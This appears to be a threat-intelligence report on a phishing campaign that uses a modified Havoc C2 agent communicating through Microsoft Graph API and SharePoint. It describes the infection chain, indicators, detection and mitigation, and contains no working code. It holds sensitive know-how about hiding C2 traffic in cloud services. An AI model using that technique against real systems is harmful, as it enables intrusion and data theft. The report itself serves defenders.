Full Report
A new phishing campaign has been identified using Havoc to control infected systems, leveraging SharePoint and Microsoft Graph API
Analysis Summary
# Tool/Technique: Havoc Command-and-Control (C2) Framework
## Overview
Havoc is an open-source command-and-control (C2) framework being leveraged in a recent phishing campaign. Attackers utilize modified versions of its components, specifically the Havoc Demon Agent, to establish control over infected systems, notably by using the Microsoft Graph API and legitimate SharePoint functions for covert communications.
## Technical Details
- Type: Attack Tool / Framework (C2)
- Platform: Windows (Implied by PowerShell and general usage context, specifics of the agent execution are typically Windows-focused)
- Capabilities: Remote command execution, data exfiltration, token manipulation, Kerberos attacks, C2 communication obfuscation via legitimate cloud APIs.
- First Seen: Information not explicitly stated in the text, but the campaign reporting date is March 3, 2025.
## MITRE ATT&CK Mapping (Inferred from execution chain and use)
- TA0011 - Command and Control
- T1071 - Application Layer Protocol
- T1071.001 - Web Protocols (Used via Microsoft Graph API/SharePoint)
- TA0005 - Defense Evasion
- T1204 - User Execution
- T1204.002 - Malicious File
- TA0002 - Execution
- T1059 - Command and Scripting Interpreter
- T1059.001 - PowerShell
- TA0010 - Exfiltration
- T1567 - Exfiltration Over Web Service (Via Graph API/SharePoint)
## Functionality
### Core Capabilities
- **Multi-Stage Infection Chain:** Utilizes a phishing email leading to an HTML attachment triggering a ClickFix social engineering event.
- **PowerShell Execution:** Downloads and executes a remote PowerShell script for initial setup.
- **Environment Verification:** The initial script checks for sandbox environments.
- **Dependency Handling:** Downloads and installs a Python interpreter if one is not present.
- **Memory Execution:** Retrieves and executes a hidden Python shellcode loader designed to execute shellcode directly in memory.
### Advanced Features
- **Obfuscation with KaynLdr:** Employs KaynLdr (a GitHub-hosted shellcode loader) which uses API hashing to conceal its execution.
- **Covert C2 Communication:** Uses a modified Havoc Demon DLL to communicate with the C2 server exclusively through the Microsoft Graph API, embedding activity within legitimate SharePoint functionality.
- **Encrypted C2:** All communication is encrypted using AES-256 in CTR mode.
- **Persistence/Control:** Establishes persistence markers by modifying the system registry.
- **File Staging on SharePoint:** Creates covert data transfer files within victim SharePoint document libraries using victim-specific identifiers (e.g., `{VictimID}pD9-tKout` for outgoing data, `{VictimID}pD9-tKin` for incoming commands).
- **Post-Exploitation:** Capable of executing arbitrary commands, exfiltrating data, manipulating user tokens, and conducting Kerberos attacks.
## Indicators of Compromise
- File Hashes: [Not provided in the text]
- File Names:
- Initial attachment: `Documents.html`
- SharePoint Data Files (example structure): `{VictimID}pD9-tKout`, `{VictimID}pD9-tKin`
- Registry Keys: [Mentioned as being modified, but specific keys are not provided]
- Network Indicators: C2 communication channels utilize the **Microsoft Graph API** and **SharePoint** URLs (defanged: `[C2_domain]/sites/sharepoint_path`).
- Behavioral Indicators:
- Execution of unauthorized PowerShell scripts initiated by user interaction with an HTML attachment.
- Installation of a Python interpreter stage.
- Creation of unusual file names within user-accessible SharePoint document libraries.
- Network traffic patterned after legitimate Microsoft Graph API/SharePoint calls.
## Associated Threat Actors
- Not explicitly named in the article, but described as "bad actor groups" utilizing open-source frameworks with high sophistication.
## Detection Methods
- Signature-based detection: Less effective due to reliance on open-source and legitimate cloud services.
- Behavioral detection: Necessary to monitor PowerShell execution flow leading to remote script downloads and in-memory execution.
- YARA rules: [Not provided in the text]
- **Specific Monitoring:** Monitoring SharePoint activity for suspicious file creation patterns (e.g., the `{VictimID}pD9-*` naming convention).
- **API Security:** Advanced threat detection capable of identifying anomalous C2 traffic hidden within Microsoft Graph API requests.
## Mitigation Strategies
- Train employees to recognize sophisticated phishing attempts (social engineering/ClickFix).
- Restrict the execution of unauthorized PowerShell scripts (Principle of Least Privilege for execution environments).
- Implement advanced threat detection capable of identifying command-and-control traffic masked as legitimate cloud service interactions.
- Proactively address API security risks related to Microsoft Graph API usage.
## Related Tools/Techniques
- **ClickFix:** The social engineering tactic used to initiate the payload delivery.
- **KaynLdr:** A specific shellcode loader utilizing API hashing.
- **Havoc Demon Agent:** The modified C2 implant component.
- General use of legitimate cloud services (SharePoint, Microsoft Graph API) to blend in during C2 communication.